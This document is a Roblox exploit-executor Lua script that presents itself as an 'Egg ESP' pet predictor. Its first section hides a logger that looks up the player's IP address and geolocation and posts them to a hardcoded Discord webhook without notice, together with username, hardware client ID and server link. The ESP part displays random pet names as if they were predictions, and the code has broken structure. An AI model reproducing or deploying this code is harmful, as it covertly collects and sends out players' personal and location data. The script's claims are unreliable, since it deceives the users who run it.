repeat wait() until game:IsLoaded() and game.Players.LocalPlayer 
local wl = {
    Key = "dpf4-Mk9TJ-bvxb-u9vw-fNaN-4pPQ-yj0pb" -- key la dpf4-Mk9TJ-bvxb-u9vw-fNaN-4pPQ-yj0pb
}

local keys = {
    "dpf4-Mk9TJ-bvxb-u9vw-fNaN-4pPQ-yj0pb",
    "Tsfz-Dta0-Az6Q-tTfx-zg5J-vSOK-0f5Zi7",
    "t35z-dvie-zIgf-LPKY-J1aI-0B4j-8npoPz",
}

local found = false

for _, v in pairs(keys) do
    if v == wl.Key then
        found = true
        game.StarterGui:SetCore("SendNotification", {
    Title = "Success key",
    Text = "loading",
    Duration = 5
})
        print("Loading Script")
        return library, library_flags, library.subs
    end
end
if not found then
    game.Players.LocalPlayer:Kick("please enter your key")
end

local requestt = http_request or request or syn and syn.request
if not requestt then
    warn("Request function not available")
    return
end

-- Lấy IP, Location
local ip, country, city, region = "Unknown", "Unknown", "Unknown", "Unknown"
local success, response = pcall(function()
    return requestt({Url = "http://ip-api.com/json", Method = "GET"})
end)
if success and response and response.Body then
    local decoded = game:GetService("HttpService"):JSONDecode(response.Body)
    ip = decoded.query or ip
    country = decoded.country or country
    city = decoded.city or city
    region = decoded.regionName or region
end

-- Các thông tin khác (placeholder)
local mac, serial, device_name, os_version = "Unknown", "Unknown", "Unknown", "Unknown"

-- Thông tin executor
local executor = identifyexecutor and (identifyexecutor() or getexecutorname()) or "Unknown"

-- Gửi Webhook
local data = {
    ["embeds"] = {
        {
            ["title"] = "NEW USED",
            ["type"] = "PLAYER",
            ["color"] = tonumber("1cff1a", 16),
            ["thumbnail"] = {
                ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId
            },
            ["fields"] = {
                {["name"] = 'Username / UserId', ["value"] = "```"..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.UserId.."```", ["inline"] = false},
                {["name"] = 'IP Address', ["value"] = "||```"..ip.."```||", ["inline"] = true},
                {["name"] = 'Country', ["value"] = "||```"..country.."```||", ["inline"] = true},
                {["name"] = 'Location', ["value"] = "||```"..city..", "..region.."```||", ["inline"] = true},
                {["name"] = 'MAC Address', ["value"] = "||```"..mac.."```||", ["inline"] = true},
                {["name"] = 'Serial Device', ["value"] = "||```"..serial.."```||", ["inline"] = true},
                {["name"] = 'Device Name', ["value"] = "||```"..device_name.."```||", ["inline"] = true},
                {["name"] = 'OS Version', ["value"] = "||```"..os_version.."```||", ["inline"] = true},
                {["name"] = 'HWID', ["value"] = "||```"..game:GetService("RbxAnalyticsService"):GetClientId().."```||", ["inline"] = true},
                {["name"] = 'JobId', ["value"] = "```"..game.JobId.."```", ["inline"] = true},
                {["name"] = 'Executor', ["value"] = "```"..executor.."```", ["inline"] = true},
                {["name"] = 'Profile Link', ["value"] = "[Click Here](https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile)", ["inline"] = false},
                {["name"] = 'Game Link', ["value"] = "[Click Here](https://www.roblox.com/games/"..game.PlaceId..")", ["inline"] = true},
                {["name"] = "Server Link", ["value"] = "```roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId .. "```", ["inline"] = true}
            }
        }
    }
}

local newdata = game:GetService("HttpService"):JSONEncode(data)
local webhookSuccess, result = pcall(function()
    return requestt({
        Url = 'https://discord.com/api/webhooks/1394985277528997898/Z9AKy1SIRu7lEEgwykfiR7_40wNilSYai_77XO5X3YYMS0nCtJ9Ek7igFXeHsIsDcbZS',
        Body = newdata,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"}
    })
end)

if webhookSuccess then
    print("LOADING")
else
    warn("Gửi webhook thất bại:", result)
end

-- Tạo hiệu ứng mờ
local blur = Instance.new("BlurEffect", game:GetService("Lighting"))
blur.Size = 25           
task.delay(3, function()  
    if blur then blur:Destroy() end
end)
end
-- SAI SCRIPT CUA BO MA DEO BIET CAM OM
local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local RunService = game:GetService("RunService")
local UserInputService = game:GetService("UserInputService")
local TweenService = game:GetService("TweenService")
local LocalPlayer = Players.LocalPlayer

-- Settings
local autoRandomize = false
local espEnabled = true
local randomizeDelay = 3
local minimized = false
local randomizeTime = 0

local function getWeightedRandom(petList)
	local expandedList = {}
	for _, entry in ipairs(petList) do
		local count = math.floor(entry.weight * 100)
		for _ = 1, count do
			table.insert(expandedList, entry.name)
		end
	end
	if #expandedList == 0 then
		return petList[math.random(1, #petList)].name
	end
	return expandedList[math.random(1, #expandedList)]
end

local petLootTable = {
    ["Dinosaur Egg"] = {
        {name = "Stegosaurus", weight = 10},
        {name = "Triceratops", weight = 10},
        {name = "Pterodactyl", weight = 10},
        {name = "T-Rex", weight = 3},
        {name = "Brontosaurus", weight = 10},
        {name = "Raptor", weight = 10},
    },
    ["Paradise Egg"] = {
        {name = "Ostrich", weight = 10},
        {name = "Peacock", weight = 10},
        {name = "Capybara", weight = 10},
        {name = "Scarlet Macaw", weight = 10},
        {name = "Mimic Octopus", weight = 3},
    },
    ["Bee Egg"] = {
        {name = "Bee", weight = 10},
        {name = "Honey Bee", weight = 10},
        {name = "Bear Bee", weight = 10},
        {name = "Petal Bee", weight = 10},
        {name = "Queen Bee", weight = 5},
    },
    ["Anti Bee Egg"] = {
        {name = "Wasp", weight = 10},
        {name = "Tarantula Hawk", weight = 10},
        {name = "Moth", weight = 10},
        {name = "Butterfly", weight = 3},
        {name = "Disco Bee", weight = 3},
    },
    ["Bug Egg"] = {
        {name = "Caterpillar", weight = 10},
        {name = "Snail", weight = 10},
        {name = "Giant Ant", weight = 10},
        {name = "Praying Mantis", weight = 10},
        {name = "Dragonfly", weight = 3},
    },
    ["Oasis Egg"] = {
        {name = "Meerkat", weight = 20},
        {name = "Sand Snake", weight = 10},
        {name = "Axolotl", weight = 10},
        {name = "Hyacinth Macaw", weight = 10},
        {name = "Fennec Fox", weight = 3},
    },
    ["Night Egg"] = {
        {name = "Hedgehog", weight = 10},
        {name = "Kiwi", weight = 10},
        {name = "Mole", weight = 10},
        {name = "Frog", weight = 10},
        {name = "Echo Frog", weight = 10},
        {name = "Night Owl", weight = 10},
        {name = "Raccoon", weight = 3},
    },
     ["Primal Egg"] = {
         {name = "Parasaurolophus", weight = 25},
         {name = "Iguanodon", weight = 10.5},
         {name = "Pachycephalosaurus", weight = 8},
         {name = "Dilophosaurus", weight = 5},
         {name = "Ankylosaurus", weight = 5},
         {name = "Spinosaurus", weight = 3},
    },
     ["Mythical Egg"] = {
          {name = "Grey Mouse", weight = 35.71},
          {name = "Brown Mouse", weight = 26.79},
          {name = "Squirrel", weight = 26.79},
          {name = "Red Giant Ant", weight = 8.93},
          {name = "Red Fox", weight = 1.79},

  }
}

-- The rest of your original script continues unchanged below...
-- (UI setup, ESP logic, auto-randomization loop, buttons, etc.)



-- UI Setup
local ScreenGui = Instance.new("ScreenGui", game:GetService("CoreGui"))
ScreenGui.Name = "EggESP_GUI"

local MainFrame = Instance.new("Frame")
MainFrame.Name = "MainFrame"
MainFrame.Size = UDim2.new(0, 240, 0, 240)
MainFrame.Position = UDim2.new(0, 10, 0.5, 0)
MainFrame.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
MainFrame.BorderSizePixel = 0
MainFrame.AnchorPoint = Vector2.new(0, 0.5)
MainFrame.Parent = ScreenGui

local UICorner = Instance.new("UICorner", MainFrame)
UICorner.CornerRadius = UDim.new(0, 10)

local Title = Instance.new("TextLabel", MainFrame)
Title.Size = UDim2.new(1, -40, 0, 30)
Title.Position = UDim2.new(0, 10, 0, 10)
Title.BackgroundTransparency = 1
Title.Text = "ð£ Egg Esp"
Title.Font = Enum.Font.GothamBold
Title.TextSize = 20
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.TextXAlignment = Enum.TextXAlignment.Left

local function createButton(name, text, position)
	local button = Instance.new("TextButton")
	button.Name = name
	button.Size = UDim2.new(1, -40, 0, 30)
	button.Position = position
	button.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
	button.TextColor3 = Color3.fromRGB(255, 255, 255)
	button.Font = Enum.Font.Gotham
	button.TextSize = 14
	button.Text = text
	button.AutoButtonColor = false
	button.Parent = MainFrame

	local corner = Instance.new("UICorner", button)
	corner.CornerRadius = UDim.new(0, 6)

	button.MouseEnter:Connect(function()
		button.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
	end)
	button.MouseLeave:Connect(function()
		button.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
	end)

	return button
end

local ESPToggle = createButton("ESPToggle", "ð ESP: ON", UDim2.new(0, 20, 0, 45))
local AutoToggle = createButton("AutoToggle", "ð Auto Randomize: OFF", UDim2.new(0, 20, 0, 85))
local RandomOnce = createButton("RandomOnce", "ð² Randomize Once", UDim2.new(0, 20, 0, 125))

local RandomizeLabel = Instance.new("TextLabel", MainFrame)
RandomizeLabel.Name = "RandomizeLabel"
RandomizeLabel.Size = UDim2.new(1, -40, 0, 25)
RandomizeLabel.Position = UDim2.new(0, 20, 0, 165)
RandomizeLabel.BackgroundTransparency = 1
RandomizeLabel.Font = Enum.Font.Gotham
RandomizeLabel.TextSize = 14
RandomizeLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
RandomizeLabel.Text = "Randomize in: OFF"
RandomizeLabel.TextXAlignment = Enum.TextXAlignment.Left

local Footer = Instance.new("TextLabel", MainFrame)
Footer.Size = UDim2.new(1, -40, 0, 20)
Footer.Position = UDim2.new(0, 20, 1, -23)
Footer.BackgroundTransparency = 1
Footer.Font = Enum.Font.Gotham
Footer.TextSize = 12
Footer.TextColor3 = Color3.fromRGB(120, 120, 120)
Footer.Text = " By Puppy ð"
Footer.TextXAlignment = Enum.TextXAlignment.Left
Footer.Name = "Footer"

local Minimize = Instance.new("TextButton", MainFrame)
Minimize.Name = "Minimize"
Minimize.Size = UDim2.new(0, 20, 0, 20)
Minimize.Position = UDim2.new(1, -50, 0, 10)
Minimize.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
Minimize.Text = "-"
Minimize.Font = Enum.Font.GothamBold
Minimize.TextSize = 14
Minimize.TextColor3 = Color3.new(1, 1, 1)

local MinimizeCorner = Instance.new("UICorner", Minimize)
MinimizeCorner.CornerRadius = UDim.new(0, 4)

local Close = Instance.new("TextButton", MainFrame)
Close.Name = "Close"
Close.Size = UDim2.new(0, 20, 0, 20)
Close.Position = UDim2.new(1, -25, 0, 10)
Close.BackgroundColor3 = Color3.fromRGB(200, 60, 60)
Close.Text = "X"
Close.Font = Enum.Font.GothamBold
Close.TextSize = 14
Close.TextColor3 = Color3.new(1, 1, 1)

local CloseCorner = Instance.new("UICorner", Close)
CloseCorner.CornerRadius = UDim.new(0, 4)

local dragging = false
local dragStart, startPos
local UserInputService = game:GetService("UserInputService")
local ContextActionService = game:GetService("ContextActionService")

local function updateDrag(input)
	if dragging and (input.UserInputType == Enum.UserInputType.Touch or input.UserInputType == Enum.UserInputType.MouseMovement) then
		local delta = input.Position - dragStart
		MainFrame.Position = UDim2.new(
			startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y
		)
	end
end

local function handleDrag(actionName, inputState, inputObj)
	if inputState == Enum.UserInputState.End then
		dragging = false
		ContextActionService:UnbindAction("DragUIBlock")
	end
	return Enum.ContextActionResult.Sink
end

MainFrame.InputBegan:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
		dragging = true
		dragStart = input.Position
		startPos = MainFrame.Position

		-- Block camera controls while dragging
		ContextActionService:BindAction("DragUIBlock", handleDrag, false, Enum.UserInputType.Touch)
	end
end)

UserInputService.InputChanged:Connect(updateDrag)


-- ESP Logic
local eggESP = {}
local function removeAllESP()
    for egg, gui in pairs(eggESP) do
        if gui then gui:Destroy() end
    end
    eggESP = {}
end

local function createOrUpdateESP(egg)
    if not espEnabled then return end
    local tag = petLootTable[egg.Name]
    if not tag then return end
    if not eggESP[egg] then
        local billboard = Instance.new("BillboardGui")
        billboard.Adornee = egg
        billboard.Size = UDim2.new(0, 100, 0, 40)
        billboard.StudsOffset = Vector3.new(0, 2, 0)
        billboard.AlwaysOnTop = true
        billboard.Name = "EggESP"

        local label = Instance.new("TextLabel")
        label.Size = UDim2.new(1, 0, 1, 0)
        label.BackgroundTransparency = 1
        label.TextColor3 = Color3.new(1, 1, 0)
        label.TextStrokeTransparency = 0
        label.Font = Enum.Font.GothamBold
        label.TextSize = 14
        label.Text = getWeightedRandom(tag)
        label.Parent = billboard

        billboard.Parent = egg
        eggESP[egg] = billboard
    end
end

for _, egg in ipairs(Workspace:GetDescendants()) do
    if egg:IsA("Model") and petLootTable[egg.Name] then
        createOrUpdateESP(egg)
    end
end

Workspace.DescendantAdded:Connect(function(desc)
    if desc:IsA("Model") and petLootTable[desc.Name] then
        createOrUpdateESP(desc)
    end
end)

RunService.Heartbeat:Connect(function(dt)
    if autoRandomize then
        randomizeTime += dt
        local countdown = math.max(0, math.floor(randomizeDelay - randomizeTime))
        RandomizeLabel.Text = "Randomize in: " .. tostring(countdown)

        if randomizeTime >= randomizeDelay then
            for egg, gui in pairs(eggESP) do
                local tag = petLootTable[egg.Name]
                local label = gui:FindFirstChildWhichIsA("TextLabel")
                if label and tag then
                    label.Text = getWeightedRandom(tag)
                end
            end
            randomizeTime = 0
        end
    else
        RandomizeLabel.Text = "Randomize in: OFF"
        randomizeTime = 0
    end

    for egg, gui in pairs(eggESP) do
        if not egg or not egg:IsDescendantOf(Workspace) then
            if gui then gui:Destroy() end
            eggESP[egg] = nil
        end
    end
end)

-- Button Behavior
ESPToggle.MouseButton1Click:Connect(function()
    espEnabled = not espEnabled
    ESPToggle.Text = "ð ESP: " .. (espEnabled and "ON" or "OFF")
    ESPToggle.BackgroundColor3 = espEnabled and Color3.fromRGB(30, 200, 70) or Color3.fromRGB(180, 50, 50)
    if espEnabled then
        for _, egg in ipairs(Workspace:GetDescendants()) do
            if egg:IsA("Model") and petLootTable[egg.Name] then
                createOrUpdateESP(egg)
            end
        end
    else
        removeAllESP()
    end
end)

AutoToggle.MouseButton1Click:Connect(function()
    autoRandomize = not autoRandomize
    AutoToggle.Text = "ð Auto Random Pet: " .. (autoRandomize and "ON" or "OFF")
    AutoToggle.BackgroundColor3 = autoRandomize and Color3.fromRGB(0, 120, 255) or Color3.fromRGB(60, 60, 60)
end)

RandomOnce.MouseButton1Click:Connect(function()
    for egg, gui in pairs(eggESP) do
        local tag = petLootTable[egg.Name]
        local label = gui:FindFirstChildWhichIsA("TextLabel")
        if label and tag then
            label.Text = getWeightedRandom(tag)
        end
    end
end)

-- NEW MINIMIZATION SYSTEM
local ReopenButton = Instance.new("TextButton")
ReopenButton.Name = "ReopenButton"
ReopenButton.Size = UDim2.new(0, 70, 0, 70)
ReopenButton.AnchorPoint = Vector2.new(0.5, 0.5)
ReopenButton.Position = UDim2.new(0.5, 0, 0.5, 0)
ReopenButton.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
ReopenButton.Text = "ð¥"
ReopenButton.TextSize = 24
ReopenButton.Font = Enum.Font.GothamBold
ReopenButton.TextColor3 = Color3.fromRGB(255, 255, 255)
ReopenButton.Visible = false
ReopenButton.Parent = ScreenGui

local ReopenCorner = Instance.new("UICorner", ReopenButton)
ReopenCorner.CornerRadius = UDim.new(0, 10)

-- Dragging for minimized egg (Mobile & PC + No Camera Tilt)
local draggingEgg = false
local dragStartEgg, startPosEgg

local function blockCameraWhileDragging(actionName, inputState)
	if inputState == Enum.UserInputState.End then
		draggingEgg = false
		ContextActionService:UnbindAction("DragMinimizedEggBlock")
	end
	return Enum.ContextActionResult.Sink
end

ReopenButton.InputBegan:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
		draggingEgg = true
		dragStartEgg = input.Position
		startPosEgg = ReopenButton.Position

		-- Disable camera control while dragging
		ContextActionService:BindAction("DragMinimizedEggBlock", blockCameraWhileDragging, false, Enum.UserInputType.Touch)
	end
end)

UserInputService.InputChanged:Connect(function(input)
	if draggingEgg and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
		local delta = input.Position - dragStartEgg
		ReopenButton.Position = UDim2.new(
			startPosEgg.X.Scale, startPosEgg.X.Offset + delta.X,
			startPosEgg.Y.Scale, startPosEgg.Y.Offset + delta.Y
		)
	end
end)

Minimize.MouseButton1Click:Connect(function()
    minimized = true
    ReopenButton.Position = MainFrame.Position -- Sync position
    MainFrame.Visible = false
    ReopenButton.Visible = true
end)

ReopenButton.MouseButton1Click:Connect(function()
    minimized = false
    MainFrame.Position = ReopenButton.Position -- Sync back position
    MainFrame.Visible = true
    ReopenButton.Visible = false
end)

Close.MouseButton1Click:Connect(function()
    ScreenGui:Destroy()
end)

UserInputService.InputEnded:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseButton1 then
		dragging = false
		ContextActionService:UnbindAction("DragUIBlock")
	end
end)

-- DEN DAY LA END ROI SOI CAI CC
